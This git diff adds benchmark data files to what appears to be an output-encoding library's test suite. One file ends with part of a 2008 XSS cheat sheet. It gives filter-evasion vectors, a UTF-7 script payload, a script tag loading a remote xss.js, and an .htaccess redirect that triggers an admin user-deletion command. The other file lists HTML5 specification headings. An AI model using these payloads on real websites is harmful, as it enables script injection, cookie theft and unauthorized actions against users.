    +STYLE +tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts): + +STYLE attribute using a comment +to break up expression (Thanks to +Roman Ivanov +for this one): + +Anonymous HTML with STYLE attribute +(IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter): + +IMG STYLE with expression +(this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop): +exp/* +STYLE tag +(Older versions of Netscape only): + +STYLE tag using background-image + +STYLE tag using background + +Downlevel-Hidden +block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job: + +BASE +tag. Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work): + +OBJECT +tag (if they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS: + +Using an OBJECT tag +you can embed XSS directly (this is unverified so no browser support is added): + +Using an EMBED tag +you can embed a Flash movie that contains XSS. +Click here for a demo +. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: + +You can EMBED SVG +which can contain your XSS vector. This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to +nEUrOO +for this one. + +Using ActionScript +inside flash can obfuscate your XSS vector: +a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); +XML namespace +. The htc file must be located on the same server as your XSS vector: + XSS +XML data island +with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by +Sec Consult +while auditing Yahoo: +]]> +XML data island with comment obfuscation +(this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive): +<IMG SRC="javascript:alert('XSS')"> +Locally hosted XML with embedded JavaScript +that is generated using an XML data island. This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result + +HTML+TIME in XML +. This is how +Grey Magic hacked Hotmail and Yahoo! +. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work: + +Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript +file to an image as an XSS vector: + +SSI +(Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues: + +PHP +- requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues: +alert("XSS")'); ?> +IMG Embedded +commands - this works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors: + +IMG Embedded commands part II +- this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this): +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +Cookie manipulation +- admittidly this is pretty obscure but I have seen a few examples where +UTF-7 +encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to +for this one). Click +for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. +Watchfire found this hole +in Google's custom 404 script.: + +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +XSS using HTML quote encapsulation: +This was tested in IE, your mileage may vary. For performing XSS on sites that allow " +For performing XSS on sites that allow " +Another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i": + +Yet another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow +And one last XSS attack to evade, "/\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox): + +Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly: + +This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content: +PT SRC="http://ha.ckers.org/xss.js"> +URL string evasion (assuming "http://www.google.com/" is programmatically disallowed): +IP verses hostname: +XSS +URL encoding: +XSS +Dword encoding (Note: there are other of variations of Dword encoding - see the +IP Obfuscation calculator below +for more details): +XSS +Hex encoding (the total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required): +XSS +Octal encoding (again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...): +XSS +Mixed encoding (let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes: +XSS +Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to +Ozh +for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. +XSS +Google "feeling lucky" part 1. Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatinate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0. +XSS +Google "feeling lucky" part 2. This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0: +XSS +Google "feeling lucky" part 3. This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"): +XSS +Removing cnames (when combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly): +XSS +Extra dot for absolute DNS: +XSS +JavaScript link location: +XSS +Content replace as attack vector (assuming "http://www.google.com/" is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself ( +here is an example +) to help create the attack vector (IE: "java&#x09;script:" was converted into "java script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera): +XSS +Character Encoding: +All the possible combinations of the character "<" in HTML and JavaScript (in UTF-8). Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above (standards are great, aren't they?): +< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C +Character Encoding Calculator +ASCII Text: +Enter your XSS here +Hex Value: +URL: +HTML (with semicolons): +Decimal Value: +HTML (without semicolons): +Base64 Value +( +a more robust base64 calculator can be found here +) +Base64: +IP Obfuscation Calculator +IP Address: +: dword level +Dword Address: +Hex Address: +Octal Address: +Browser support reference table: +Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2. +Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000. +Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed it's security model away from the trusted/untrusted model and has opted towards Gecko as a default and IE as an option. +Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional +Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional. +Vector works in Opera. Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional +Vector works in older versions of Netscape 4.0 - untested. +Note: if a vector is not marked it either does not work or it is untested. +Written in vim, and UTF-8 encoded, for her pleasure. +All rights reserved, all wrongs observed. +© 1995-2008 diff --git a/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt b/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt new file mode 100644 index 0000000..da3e2d0 --- /dev/null +++ b/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt @@ -0,0 +1,4921 @@ +"already\n started" +"already\n started" +"already started" +"current" position +"force-async" +"parser-inserted" +"ready to be parser-executed" +<fragment> +<host> +<hostport> +<meta name=""\n content=""> +<path> +<port> +<query> +<scheme> +<script type=""> +5\n February 2004 W3C Patent Policy +:active +:checked +:default +:dir(ltr) +:dir(rtl) +:disabled +:enabled +:in-range +:indeterminate +:invalid +:link +:optional +:out-of-range +:read-only +:read-write +:required +:valid +:visited +ERCIM +MIT +W3C +Name +application/x-www-form-urlencoded encoding\n algorithm +application/x-www-form-urlencoded encoding\n algorithm +data:\n URL +data:\n URL +data: URL +form element\n pointer +form element pointer +head\n element pointer +head element\n pointer +head element pointer +javascript:\n URL +javascript: URL +lang\n attribute in the XML namespace +lang\n attributes in the XML namespace +lang attribute\n in the XML namespace +lang attribute in the\n XML namespace +lang attribute in the XML\n namespace +lang attributes in\n the XML namespace +lang attributes in the\n XML namespace +multipart/form-data boundary string +multipart/form-data encoding\n algorithm +multipart/form-data encoding\n algorithm +text/plain encoding\n algorithm +dropzone processing\n steps +form element\n pointer +form element pointer +CDATASection nodes in the DOM are treated as\n equivalent to Text nodes +MediaStream and\n PeerConnection events +XMLHttpRequest +form element\n pointer +form element pointer +head element +hreflang\n attribute on a and area\n elements +html element +iframe srcdoc documents +input type keyword +javascript:\n URL +javascript: URL +in the\n Document +parent browsing context +W3C +1 Introduction +1.1 Background +1.10 Recommended reading +1.2 Audience +1.3 Scope +1.4 History +1.5 Design notes +1.5.1 Serializability of script execution +1.5.2 Compliance with other specifications +1.6 HTML vs XHTML +1.7 Structure of this specification +1.7.1 How to read this specification +1.7.2 Typographic conventions +1.8 A quick introduction to HTML +1.8.1 Writing secure applications with HTML +1.8.2 Common pitfalls to avoid when using the scripting APIs +1.9 Conformance requirements for authors +1.9.1 Presentational markup +1.9.2 Syntax errors +1.9.3 Restrictions on content models and on attribute values +10 Rendering +10.1 Introduction +10.2 The CSS user agent style sheet and presentational hints +10.3 Non-replaced elements +10.3.1 Hidden elements +10.3.10 The hr element +10.3.11 The fieldset element +10.3.2 The page +10.3.3 Flow content +10.3.4 Phrasing content +10.3.5 Bidirectional text +10.3.6 Sections and headings +10.3.7 Lists +10.3.8 Tables +10.3.9 Form controls +10.4 Replaced elements +10.4.1 Embedded content +10.4.2 Timed text tracks +10.4.2.1 WebVTT cue text rendering rules +10.4.2.2 Applying CSS properties to WebVTT Node Objects +10.4.2.3 CSS extensions +10.4.2.3.1 The '::cue' pseudo-element +10.4.2.3.2 The ':past' and ':future' pseudo-classes +10.4.3 Images +10.4.4 Attributes for embedded content and images +10.4.5 Image maps +10.4.6 Toolbars +10.5 Bindings +10.5.1 Introduction +10.5.10 The input element as a button +10.5.11 The marquee element +10.5.12 The meter element +10.5.13 The progress element +10.5.14 The select element +10.5.15 The textarea element +10.5.16 The keygen element +10.5.17 The time element +10.5.2 The button element +10.5.3 The details element +10.5.4 The input element as a text entry widget +10.5.5 The input element as domain-specific widgets +10.5.6 The input element as a range control +10.5.7 The input element as a color well +10.5.8 The input element as a checkbox and radio button widgets +10.5.9 The input element as a file upload control +10.6 Frames and framesets +10.7 Interactive media +10.7.1 Links, forms, and navigation +10.7.2 The title attribute +10.7.3 Editing hosts +10.7.4 Text rendered in native user interfaces +10.8 Print media +11 Obsolete features +11.1 Obsolete but conforming features +11.1.1 Warnings for obsolete but conforming features +11.2 Non-conforming features +11.3 Requirements for implementations +11.3.1 The applet element +11.3.2 The marquee element +11.3.3 Frames +11.3.4 Other elements, attributes and APIs +12 IANA considerations +12.1 text/html +12.2 multipart/x-mixed-replace +12.3 application/xhtml+xml +12.4 application/x-www-form-urlencoded +12.5 text/cache-manifest +12.6 web+ scheme prefix +2 Common infrastructure +2.1 Terminology +2.1.1 Resources +2.1.2 XML +2.1.3 DOM trees +2.1.4 Scripting +2.1.5 Plugins +2.1.6 Character encodings +2.2 Conformance requirements +2.2.1 Conformance classes +2.2.2 Dependencies +2.2.3 Extensibility +2.3 Case-sensitivity and string comparison +2.4 UTF-8 +2.5 Common microsyntaxes +2.5.1 Common parser idioms +2.5.10 Media queries +2.5.2 Boolean attributes +2.5.3 Keywords and enumerated attributes +2.5.4 Numbers +2.5.4.1 Signed integers +2.5.4.2 Non-negative integers +2.5.4.3 Floating-point numbers +2.5.4.4 Percentages and lengths +2.5.4.5 Lists of integers +2.5.4.6 Lists of dimensions +2.5.5 Dates and times +2.5.5.1 Months +2.5.5.2 Dates +2.5.5.3 Times +2.5.5.4 Local dates and times +2.5.5.5 Global dates and times +2.5.5.6 Weeks +2.5.5.7 Vaguer moments in time +2.5.6 Colors +2.5.7 Space-separated tokens +2.5.8 Comma-separated tokens +2.5.9 References +2.6 URLs +2.6.1 Terminology +2.6.2 Parsing URLs +2.6.3 Resolving URLs +2.6.4 URL manipulation and creation +2.6.5 Dynamic changes to base URLs +2.6.6 Interfaces for URL manipulation +2.7 Fetching resources +2.7.1 Protocol concepts +2.7.2 Encrypted HTTP and related security concerns +2.7.3 Determining the type of a resource +2.7.4 Extracting encodings from meta elements +2.7.5 CORS settings attributes +2.7.6 CORS-enabled fetch +2.8 Common DOM interfaces +2.8.1 Reflecting content attributes in IDL attributes +2.8.2 Collections +2.8.2.1 HTMLAllCollection +2.8.2.2 HTMLFormControlsCollection +2.8.2.3 HTMLOptionsCollection +2.8.3 DOMStringMap +2.8.4 Transferable objects +2.8.5 Safe passing of structured data +2.8.6 DOM feature strings +2.8.7 Garbage collection +2.9 Namespaces +3 Semantics, structure, and APIs of HTML documents +3.1 Documents +3.1.1 Documents in the DOM +3.1.2 Security +3.1.3 Resource metadata management +3.1.4 DOM tree accessors +3.1.5 Loading XML documents +3.2 Elements +3.2.1 Semantics +3.2.2 Elements in the DOM +3.2.3 Global attributes +3.2.3.1 The id attribute +3.2.3.2 The title attribute +3.2.3.3 The lang and xml:lang attributes +3.2.3.4 The xml:base\n attribute (XML only) +3.2.3.5 The dir attribute +3.2.3.6 The class attribute +3.2.3.7 The style attribute +3.2.3.8 Embedding custom non-visible data with the data-* attributes +3.2.4 Element definitions +3.2.4.1 Attributes +3.2.5 Content models +3.2.5.1 Kinds of content +3.2.5.1.1 Metadata content +3.2.5.1.2 Flow content +3.2.5.1.3 Sectioning content +3.2.5.1.4 Heading content +3.2.5.1.5 Phrasing content +3.2.5.1.6 Embedded content +3.2.5.1.7 Interactive content +3.2.5.1.8 Palpable content +3.2.5.2 Transparent content models +3.2.5.3 Paragraphs +3.2.6 Requirements relating to bidirectional-algorithm formatting\n characters +3.2.7 WAI-ARIA +3.3 Interactions with XPath and XSLT +3.4 Dynamic markup insertion +3.4.1 Opening the input stream +3.4.2 Closing the input stream +3.4.3 document.write() +3.4.4 document.writeln() +4 The elements of HTML +4.1 The root element +4.1.1 The html element +4.10 Forms +4.10.1 Introduction +4.10.1.1 Writing a form's user interface +4.10.1.2 Implementing the server-side processing for a form +4.10.1.3 Configuring a form to communicate with a server +4.10.1.4 Client-side form validation +4.10.10 The datalist element +4.10.11 The optgroup element +4.10.12 The option element +4.10.13 The textarea element +4.10.14 The keygen element +4.10.15 The output element +4.10.16 The progress element +4.10.17 The meter element +4.10.18 Association of controls and forms +4.10.19 Attributes common to form controls +4.10.19.1 Naming form controls +4.10.19.2 Enabling and disabling form controls +4.10.19.3 A form control's value +4.10.19.4 Autofocusing a form control +4.10.19.5 Limiting user input length +4.10.19.6 Form submission +4.10.19.7 Submitting element directionality +4.10.2 Categories +4.10.20 APIs for the text field selections +4.10.21 Constraints +4.10.21.1 Definitions +4.10.21.2 Constraint validation +4.10.21.3 The constraint validation API +4.10.21.4 Security +4.10.22 Form submission +4.10.22.1 Introduction +4.10.22.2 Implicit submission +4.10.22.3 Form submission algorithm +4.10.22.4 Constructing the form data set +4.10.22.5 URL-encoded form data +4.10.22.6 Multipart form data +4.10.22.7 Plain text form data +4.10.23 Resetting a form +4.10.3 The form element +4.10.4 The fieldset element +4.10.5 The legend element +4.10.6 The label element +4.10.7 The input element +4.10.7.1 States of the type attribute +4.10.7.1.1 Hidden state +4.10.7.1.10 Week state +4.10.7.1.11 Time state +4.10.7.1.12 Local Date and Time state +4.10.7.1.13 Number state +4.10.7.1.14 Range state +4.10.7.1.15 Color state +4.10.7.1.16 Checkbox state +4.10.7.1.17 Radio Button state +4.10.7.1.18 File Upload state +4.10.7.1.19 Submit Button state +4.10.7.1.2 Text state and Search state +4.10.7.1.20 Image Button state +4.10.7.1.21 Reset Button state +4.10.7.1.22 Button state +4.10.7.1.3 Telephone state +4.10.7.1.4 URL state +4.10.7.1.5 E-mail state +4.10.7.1.6 Password state +4.10.7.1.7 Date and Time state +4.10.7.1.8 Date state +4.10.7.1.9 Month state +4.10.7.2 Common input element attributes +4.10.7.2.1 The autocomplete attribute +4.10.7.2.10 The min and max attributes +4.10.7.2.11 The step attribute +4.10.7.2.12 The placeholder attribute +4.10.7.2.2 The dirname attribute +4.10.7.2.3 The list attribute +4.10.7.2.4 The readonly attribute +4.10.7.2.5 The size attribute +4.10.7.2.6 The required attribute +4.10.7.2.7 The multiple attribute +4.10.7.2.8 The maxlength attribute +4.10.7.2.9 The pattern attribute +4.10.7.3 Common input element APIs +4.10.7.4 Common event behaviors +4.10.8 The button element +4.10.9 The select element +4.11 Interactive elements +4.11.1 The details element +4.11.2 The summary element +4.11.3 The command element +4.11.4 The menu element +4.11.4.1 Introduction +4.11.4.2 Building menus and toolbars +4.11.4.3 Context menus +4.11.4.4 Toolbars +4.11.5 Commands +4.11.5.1 Using the a element to define a command +4.11.5.2 Using the button element to define a command +4.11.5.3 Using the input element to define a command +4.11.5.4 Using the option element to define a command +4.11.5.5 Using the command element to define\n a command +4.11.5.6 Using the accesskey attribute on a label element to define a command +4.11.5.7 Using the accesskey attribute on a legend element to define a command +4.11.5.8 Using the accesskey attribute to define a command on other elements +4.12 Links +4.12.1 Introduction +4.12.2 Links created by a and area elements +4.12.3 Following hyperlinks +4.12.4 Link types +4.12.4.1 Link type "alternate" +4.12.4.10 Link type "search" +4.12.4.11 Link type "stylesheet" +4.12.4.12 Link type "tag" +4.12.4.13 Sequential link types +4.12.4.13.1 Link type "next" +4.12.4.13.2 Link type "prev" +4.12.4.14 Other link types +4.12.4.2 Link type "author" +4.12.4.3 Link type "bookmark" +4.12.4.4 Link type "help" +4.12.4.5 Link type "icon" +4.12.4.6 Link type "license" +4.12.4.7 Link type "nofollow" +4.12.4.8 Link type "noreferrer" +4.12.4.9 Link type "prefetch" +4.13 Common idioms without dedicated elements +4.13.1 The main part of the content +4.13.2 Bread crumb navigation +4.13.3 Tag clouds +4.13.4 Conversations +4.13.5 Footnotes +4.14 Matching HTML elements using selectors +4.14.1 Case-sensitivity +4.14.2 Pseudo-classes +4.2 Document metadata +4.2.1 The head element +4.2.2 The title element +4.2.3 The base element +4.2.4 The link element +4.2.5 The meta element +4.2.5.1 Standard metadata names +4.2.5.2 Other metadata names +4.2.5.3 Pragma directives +4.2.5.4 Other pragma directives +4.2.5.5 Specifying the document's character encoding +4.2.6 The style element +4.2.7 Styling +4.3 Scripting +4.3.1 The script element +4.3.1.1 Scripting languages +4.3.1.2 Restrictions for contents of script elements +4.3.1.3 Inline documentation for external scripts +4.3.1.4 Interaction of script elements and XSLT +4.3.2 The noscript element +4.4 Sections +4.4.1 The body element +4.4.10 The address element +4.4.11 Headings and sections +4.4.11.1 Creating an outline +4.4.2 The section element +4.4.3 The nav element +4.4.4 The article element +4.4.5 The aside element +4.4.6 The h1, h2, h3, h4, h5, and h6 elements +4.4.7 The hgroup element +4.4.8 The header element +4.4.9 The footer element +4.5 Grouping content +4.5.1 The p element +4.5.10 The dd element +4.5.11 The figure element +4.5.12 The figcaption element +4.5.13 The div element +4.5.2 The hr element +4.5.3 The pre element +4.5.4 The blockquote element +4.5.5 The ol element +4.5.6 The ul element +4.5.7 The li element +4.5.8 The dl element +4.5.9 The dt element +4.6 Text-level semantics +4.6.1 The a element +4.6.10 The time element +4.6.11 The code element +4.6.12 The var element +4.6.13 The samp element +4.6.14 The kbd element +4.6.15 The sub and sup elements +4.6.16 The i element +4.6.17 The b element +4.6.18 The u element +4.6.19 The mark element +4.6.2 The em element +4.6.20 The ruby element +4.6.21 The rt element +4.6.22 The rp element +4.6.23 The bdi element +4.6.24 The bdo element +4.6.25 The span element +4.6.26 The br element +4.6.27 The wbr element +4.6.28 Usage summary +4.6.3 The strong element +4.6.4 The small element +4.6.5 The s element +4.6.6 The cite element +4.6.7 The q element +4.6.8 The dfn element +4.6.9 The abbr element +4.7 Edits +4.7.1 The ins element +4.7.2 The del element +4.7.3 Attributes common to ins and del elements +4.7.4 Edits and paragraphs +4.7.5 Edits and lists +4.7.6 Edits and tables +4.8 Embedded content +4.8.1 The img element +4.8.1.1 Requirements for providing text to act as an alternative for images +4.8.1.1.1 General guidelines +4.8.1.1.10 A key part of the content +4.8.1.1.11 An image not intended for the user +4.8.1.1.12 Guidance for markup generators +4.8.1.1.13 Guidance for conformance checkers +4.8.1.1.2 A link or button containing nothing but the image +4.8.1.1.3 A phrase or paragraph with an alternative graphical representation: charts, diagrams, graphs, maps, illustrations +4.8.1.1.4 A short phrase or label with an alternative graphical representation: icons, logos +4.8.1.1.5 Text that has been rendered to a graphic for typographical effect +4.8.1.1.6 A graphical representation of some of the surrounding text +4.8.1.1.7 A purely decorative image that doesn't add any information +4.8.1.1.8 A group of images that form a single larger picture with no links +4.8.1.1.9 A group of images that form a single larger picture with links +4.8.10 Media elements +4.8.10.1 Error codes +4.8.10.10 Media resources with multiple media tracks +4.8.10.10.1 AudioTrackList and VideoTrackList objects +4.8.10.10.2 Selecting specific audio and video tracks declaratively +4.8.10.11 Synchronising multiple media elements +4.8.10.11.1 Introduction +4.8.10.11.2 Media controllers +4.8.10.11.3 Assigning a media controller declaratively +4.8.10.12 Timed text tracks +4.8.10.12.1 Text track model +4.8.10.12.2 Sourcing in-band text tracks +4.8.10.12.3 Sourcing out-of-band text tracks +4.8.10.12.4 Text track API +4.8.10.12.5 Text tracks describing chapters +4.8.10.12.6 Event definitions +4.8.10.13 User interface +4.8.10.14 Time ranges +4.8.10.15 Event definitions +4.8.10.16 Event summary +4.8.10.17 Security and privacy considerations +4.8.10.18 Best practices for authors using media elements +4.8.10.19 Best practices for implementors of media elements +4.8.10.2 Location of the media resource +4.8.10.3 MIME types +4.8.10.4 Network states +4.8.10.5 Loading the media resource +4.8.10.6 Offsets into the media resource +4.8.10.7 Ready states +4.8.10.8 Playing the media resource +4.8.10.9 Seeking +4.8.11 The canvas element +4.8.11.1 Color spaces and color correction +4.8.11.2 Security with canvas elements +4.8.12 The map element +4.8.13 The area element +4.8.14 Image maps +4.8.14.1 Authoring +4.8.14.2 Processing model +4.8.15 MathML +4.8.16 SVG +4.8.17 Dimension attributes +4.8.2 The iframe element +4.8.3 The embed element +4.8.4 The object element +4.8.5 The param element +4.8.6 The video element +4.8.7 The audio element +4.8.8 The source element +4.8.9 The track element +4.9 Tabular data +4.9.1 The table element +4.9.1.1 Techniques for describing tables +4.9.1.2 Techniques for table layout +4.9.10 The th element +4.9.11 Attributes common to td and th elements +4.9.12 Processing model +4.9.12.1 Forming a table +4.9.12.2 Forming relationships between data cells and header cells +4.9.13 Examples +4.9.2 The caption element +4.9.3 The colgroup element +4.9.4 The col element +4.9.5 The tbody element +4.9.6 The thead element +4.9.7 The tfoot element +4.9.8 The tr element +4.9.9 The td element +5 Loading Web pages +5.1 Browsing contexts +5.1.1 Nested browsing contexts +5.1.1.1 Navigating nested browsing contexts in the DOM +5.1.2 Auxiliary browsing contexts +5.1.2.1 Navigating auxiliary browsing contexts in the DOM +5.1.3 Secondary browsing contexts +5.1.4 Security +5.1.5 Groupings of browsing contexts +5.1.6 Browsing context names +5.2 The Window object +5.2.1 Security +5.2.2 APIs for creating and navigating browsing contexts by name +5.2.3 Accessing other browsing contexts +5.2.4 Named access on the Window object +5.2.5 Garbage collection and browsing contexts +5.2.6 Browser interface elements +5.2.7 The WindowProxy object +5.3 Origin +5.3.1 Relaxing the same-origin restriction +5.4 Session history and navigation +5.4.1 The session history of browsing contexts +5.4.2 The History interface +5.4.3 The Location interface +5.4.3.1 Security +5.4.4 Implementation notes for session history +5.5 Browsing the Web +5.5.1 Navigating across documents +5.5.10 History traversal +5.5.10.1 Event definitions +5.5.11 Unloading documents +5.5.11.1 Event definition +5.5.12 Aborting a document load +5.5.2 Page load processing model for HTML files +5.5.3 Page load processing model for XML files +5.5.4 Page load processing model for text files +5.5.5 Page load processing model for multipart/x-mixed-replace resources +5.5.6 Page load processing model for media +5.5.7 Page load processing model for content that uses plugins +5.5.8 Page load processing model for inline content that doesn't have a DOM +5.5.9 Navigating to a fragment identifier +5.6 Offline Web applications +5.6.1 Introduction +5.6.1.1 Event summary +5.6.10 Browser state +5.6.2 Application caches +5.6.3 The cache manifest syntax +5.6.3.1 Some sample manifests +5.6.3.2 Writing cache manifests +5.6.3.3 Parsing cache manifests +5.6.4 Downloading or updating an application cache +5.6.5 The application cache selection algorithm +5.6.6 Changes to the networking model +5.6.7 Expiring application caches +5.6.8 Disk space +5.6.9 Application cache API +6 Web application APIs +6.1 Scripting +6.1.1 Introduction +6.1.2 Enabling and disabling scripting +6.1.3 Processing model +6.1.3.1 Definitions +6.1.3.2 Calling scripts +6.1.3.3 Creating scripts +6.1.3.4 Killing scripts +6.1.3.5 Runtime script errors +6.1.3.5.1 Runtime script errors in documents +6.1.4 Event loops +6.1.4.1 Definitions +6.1.4.2 Processing model +6.1.4.3 Generic task sources +6.1.5 The javascript: URL scheme +6.1.6 Events +6.1.6.1 Event handlers +6.1.6.2 Event handlers on elements, Document objects, and Window objects +6.1.6.3 Event firing +6.1.6.4 Events and the Window object +6.2 Base64 utility methods +6.3 Timers +6.4 User prompts +6.4.1 Simple dialogs +6.4.2 Printing +6.4.3 Dialogs implemented using separate documents +6.5 System state and capabilities +6.5.1 The Navigator object +6.5.1.1 Client identification +6.5.1.2 Custom scheme and content handlers +6.5.1.3 Security and privacy +6.5.1.4 Sample user interface +6.5.1.5 Manually releasing the storage mutex +6.5.2 The External interface +7 User interaction +7.1 The hidden attribute +7.2 Activation +7.3 Focus +7.3.1 Sequential focus navigation and the tabindex attribute +7.3.2 Focus management +7.3.3 Document-level focus APIs +7.3.4 Element-level focus APIs +7.4 Assigning keyboard shortcuts +7.4.1 Introduction +7.4.2 The accesskey attribute +7.4.3 Processing model +7.5 Editing +7.5.1 Making document regions editable: The contenteditable content\n attribute +7.5.2 Making entire documents editable: The designMode IDL attribute +7.5.3 Best practices for in-page editors +7.5.4 Editing APIs +7.5.5 Spelling and grammar checking +7.6 Drag and drop +7.6.1 Introduction +7.6.2 The drag data store +7.6.3 The DataTransfer interface +7.6.3.1 The DataTransferItemList interface +7.6.3.2 The DataTransferItem interface +7.6.4 The DragEvent interface +7.6.5 Drag-and-drop processing model +7.6.6 Events summary +7.6.7 The draggable attribute +7.6.8 The dropzone attribute +7.6.9 Security risks in the drag-and-drop model +8 The HTML syntax +8.1 Writing HTML documents +8.1.1 The DOCTYPE +8.1.2 Elements +8.1.2.1 Start tags +8.1.2.2 End tags +8.1.2.3 Attributes +8.1.2.4 Optional tags +8.1.2.5 Restrictions on content models +8.1.2.6 Restrictions on the contents of raw text and RCDATA elements +8.1.3 Text +8.1.3.1 Newlines +8.1.4 Character references +8.1.5 CDATA sections +8.1.6 Comments +8.2 Parsing HTML documents +8.2.1 Overview of the parsing model +8.2.2 The input stream +8.2.2.1 Determining the character encoding +8.2.2.2 Character encodings +8.2.2.3 Preprocessing the input stream +8.2.2.4 Changing the encoding while parsing +8.2.3 Parse state +8.2.3.1 The insertion mode +8.2.3.2 The stack of open elements +8.2.3.3 The list of active formatting elements +8.2.3.4 The element pointers +8.2.3.5 Other parsing state flags +8.2.4 Tokenization +8.2.4.1 Data state +8.2.4.10 Tag name state +8.2.4.11 RCDATA less-than sign state +8.2.4.12 RCDATA end tag open state +8.2.4.13 RCDATA end tag name state +8.2.4.14 RAWTEXT less-than sign state +8.2.4.15 RAWTEXT end tag open state +8.2.4.16 RAWTEXT end tag name state +8.2.4.17 Script data less-than sign state +8.2.4.18 Script data end tag open state +8.2.4.19 Script data end tag name state +8.2.4.2 Character reference in data state +8.2.4.20 Script data escape start state +8.2.4.21 Script data escape start dash state +8.2.4.22 Script data escaped state +8.2.4.23 Script data escaped dash state +8.2.4.24 Script data escaped dash dash state +8.2.4.25 Script data escaped less-than sign state +8.2.4.26 Script data escaped end tag open state +8.2.4.27 Script data escaped end tag name state +8.2.4.28 Script data double escape start state +8.2.4.29 Script data double escaped state +8.2.4.3 RCDATA state +8.2.4.30 Script data double escaped dash state +8.2.4.31 Script data double escaped dash dash state +8.2.4.32 Script data double escaped less-than sign state +8.2.4.33 Script data double escape end state +8.2.4.34 Before attribute name state +8.2.4.35 Attribute name state +8.2.4.36 After attribute name state +8.2.4.37 Before attribute value state 